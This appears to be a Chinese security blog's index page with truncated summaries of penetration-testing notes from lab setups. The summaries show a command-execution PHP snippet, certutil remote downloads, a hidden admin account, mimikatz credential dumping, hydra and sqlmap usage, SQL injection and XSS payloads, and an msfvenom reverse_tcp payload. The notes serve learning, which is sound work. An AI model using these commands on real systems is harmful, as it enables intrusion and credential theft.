摘要: 一、file:// 用于访问本地系统文件,需要知道文件的绝对路径 1 <?php 2 include($_GET['file']); 3 ?>然后传参http://127.0.0.1/1/php.php?file=file://D:\\phpstudy_pro\\WWW\\c.txt 二、 php: 阅读全文
posted @ 2020-02-07 21:10 BuFFERer 阅读(874) 评论(0) 推荐(0) 编辑
摘要: 新手入门,用来记一些笔记,大佬别喷。下面记录几个PHP里面可以执行系统命令的函数。 system() <?php $a = $_GET['cmd']; system($a); ?> exec() <?php $a = $_GET['cmd']; echo exec($a); ?> passthru( 阅读全文
posted @ 2020-02-07 20:39 BuFFERer 阅读(396) 评论(0) 推荐(0) 编辑
摘要: 今天西南民大的老哥,发我一道i春秋上的题,题目名字over the hill,然后就有了这篇,也是第一篇。 先介绍一下hill,Hill 密码是一种多字母代替密码。Hill 密码要求首先将明文分成同等规模的若干个分组(最后一个分组不足时需要填充),每一个分组被整体加密变换,即 Hill 密码属于分组 阅读全文
posted @ 2020-02-07 20:37 BuFFERer 阅读(308) 评论(0) 推荐(0) 编辑
摘要: schtasks 例子1: schtasks /create /tn "123" /tr "calc.exe" /sc onlogon 创建一个名字是123的计划任务,在每次管理员登录时,启动计算器。 例子2: schtasks /Create /TN 123 /SC DAILY /ST 01:02 阅读全文
posted @ 2020-02-07 17:13 BuFFERer 阅读(126) 评论(0) 推荐(0) 编辑
摘要: certutil.exe 这里用虚拟机开一个网站(http://192.168.3.128),假设外网网站,用本机(192.168.3.1) 来实验。 下载 certutil -urlcache -split -f 文件链接 自定义文件名 下载完之后会有一个缓存,删除缓存 certutil -url 阅读全文
posted @ 2020-02-07 17:12 BuFFERer 阅读(493) 评论(0) 推荐(0) 编辑
摘要: 实验环境:windwos server 2003 一般windwos下新建用户并加到管理员组: net user test /add net localgroup adminitrators test /add 这种情况下直接cmd下执行net user就会被看到新建的用户,比较容易被发现。 简单的 阅读全文
posted @ 2020-02-07 17:10 BuFFERer 阅读(645) 评论(0) 推荐(1) 编辑
摘要: 目标机 windows server 2008 R2 第一种方法: cmd下运行mimikatz.exe,然后依次输入下面命令 privilege::debug sekurlsa::logonpasswords 成功抓到服务器密码 第二种方法: 下载个procdump,https://docs.mi 阅读全文
posted @ 2020-02-07 17:08 BuFFERer 阅读(1571) 评论(0) 推荐(0) 编辑
摘要: hydra 暴力破解工具,可爆破很多服务,例如开机用户名密码 1、破解ssh: hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra i 阅读全文
posted @ 2020-02-07 17:06 BuFFERer 阅读(254) 评论(0) 推荐(0) 编辑
摘要: GET注入 sqlmap.py -u "url" 检测存在不存在注入 sqlmap.py -u "url" --tables 列出数据库的表 sqlmap.py -u "url" --columns -T admin 列出admin的内容 sqlmap.py -u "url" --dump -T a 阅读全文
posted @ 2020-02-07 17:05 BuFFERer 阅读(380) 评论(0) 推荐(0) 编辑
摘要: 二次注入原理 二次注入可以理解成,攻击者先将攻击语句插入到数据库中,然后再调用攻击语句,完成攻击。 下面自己搭建环境复现一下 先在reg,php去插入攻击语句,username处语句为' union select 1,user(),3# (这里后面的数字只要小于等于列数 就可以,因为reg.php中 阅读全文
posted @ 2020-02-07 17:03 BuFFERer 阅读(903) 评论(0) 推荐(0) 编辑
摘要: 宽字节注入原理 当数据库编码方式为gdk时,一个汉字会占用两个字节,平常字符会占一个字节 例如:你 url编码之后为 => %c4%e3 # url编码之后为 => %23 ' url编码之后为 => %27 \ url编码之后为 => %5c addslashes函数防止sql注入,将传入参数值进 阅读全文
posted @ 2020-02-07 17:00 BuFFERer 阅读(566) 评论(0) 推荐(0) 编辑
摘要: 简单记一下看见的五种写有sql注入的情况下如何写shell 原文链接:https://manning23.github.io/2019/07/23/MYSQL%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E5%86%99WebShell 阅读全文
posted @ 2020-02-07 16:59 BuFFERer 阅读(2272) 评论(0) 推荐(0) 编辑
摘要: level 1 查看第一关的源码,发现get方法直接输入的内容,可以直接构造payload payload:<script>alert(/xss/)</script> level 2 第二关和第一关有点不一样的地方在于传入的字符串多了一个单引号,应该先闭合单引号。 payload:"><script 阅读全文
posted @ 2020-02-07 16:58 BuFFERer 阅读(360) 评论(0) 推荐(0) 编辑
摘要: pass-01 尝试上传一个php,发现提示不行。 前端js拦截了,先将php文件后缀改为允许的格式,比如jpg,burp抓包改一下就好了。后缀改为php成功上传。 访问发现上传成功。 pass-02 观察第二关的源码,发现判断content-type。 依旧burp抓包,修改content-typ 阅读全文
posted @ 2020-02-07 16:51 BuFFERer 阅读(199) 评论(0) 推荐(0) 编辑
摘要: ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了 目前已知受影响的phpstudy版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 这里用phpstudy 阅读全文
posted @ 2020-02-07 16:47 BuFFERer 阅读(157) 评论(0) 推荐(0) 编辑
摘要: 最近想复现一些漏洞并分析,打算从phpmyadmin开始。 先搭建环境 phpmyadmin版本:4.0.3 php版本:5.2.17 利用条件: 登陆后台(个人感觉鸡肋),需要截断 上级目录下放一个test.txt,内容是<? phpinfo(); ?> poc:http://localhost/ 阅读全文
posted @ 2020-02-07 16:44 BuFFERer 阅读(454) 评论(0) 推荐(0) 编辑
摘要: kali : 192.168.3.136 windows server 2012 : 192.168.3.129 1、生成一个exe远控 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.136 LPORT=12345 -f ex 阅读全文
posted @ 2020-02-07 16:41 BuFFERer 阅读(2299) 评论(0) 推荐(0) 编辑
摘要: alias Linux alias命令用于设置指令的别名。 用户可利用alias,自定指令的别名。若仅输入alias,则可列出目前所有的别名设置。alias的效力仅及于该次登入的操作。若要每次登入是即自动设好别名,可在.profile或.cshrc中设定指令的别名。 alias[别名]=[指令名称] 阅读全文
posted @ 2020-02-07 16:39 BuFFERer 阅读(1062) 评论(0) 推荐(0) 编辑
摘要: long long ago准备安装github时,输入 sudo apt-get install 后出现了如下的错误提示: E: 无法获得锁/var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它? 阅读全文
posted @ 2020-02-07 16:38 BuFFERer 阅读(242) 评论(0) 推荐(0) 编辑
摘要: 新手入门,用来记一些笔记,大佬别喷。下面记录几个PHP里面可以执行系统命令的函数。 system() <?php $a = $_GET['cmd']; system($a); ?> exec() <?php $a = $_GET['cmd']; echo exec($a); ?> passthru( 阅读全文
posted @ 2020-02-07 16:36 BuFFERer 阅读(273) 评论(0) 推荐(0) 编辑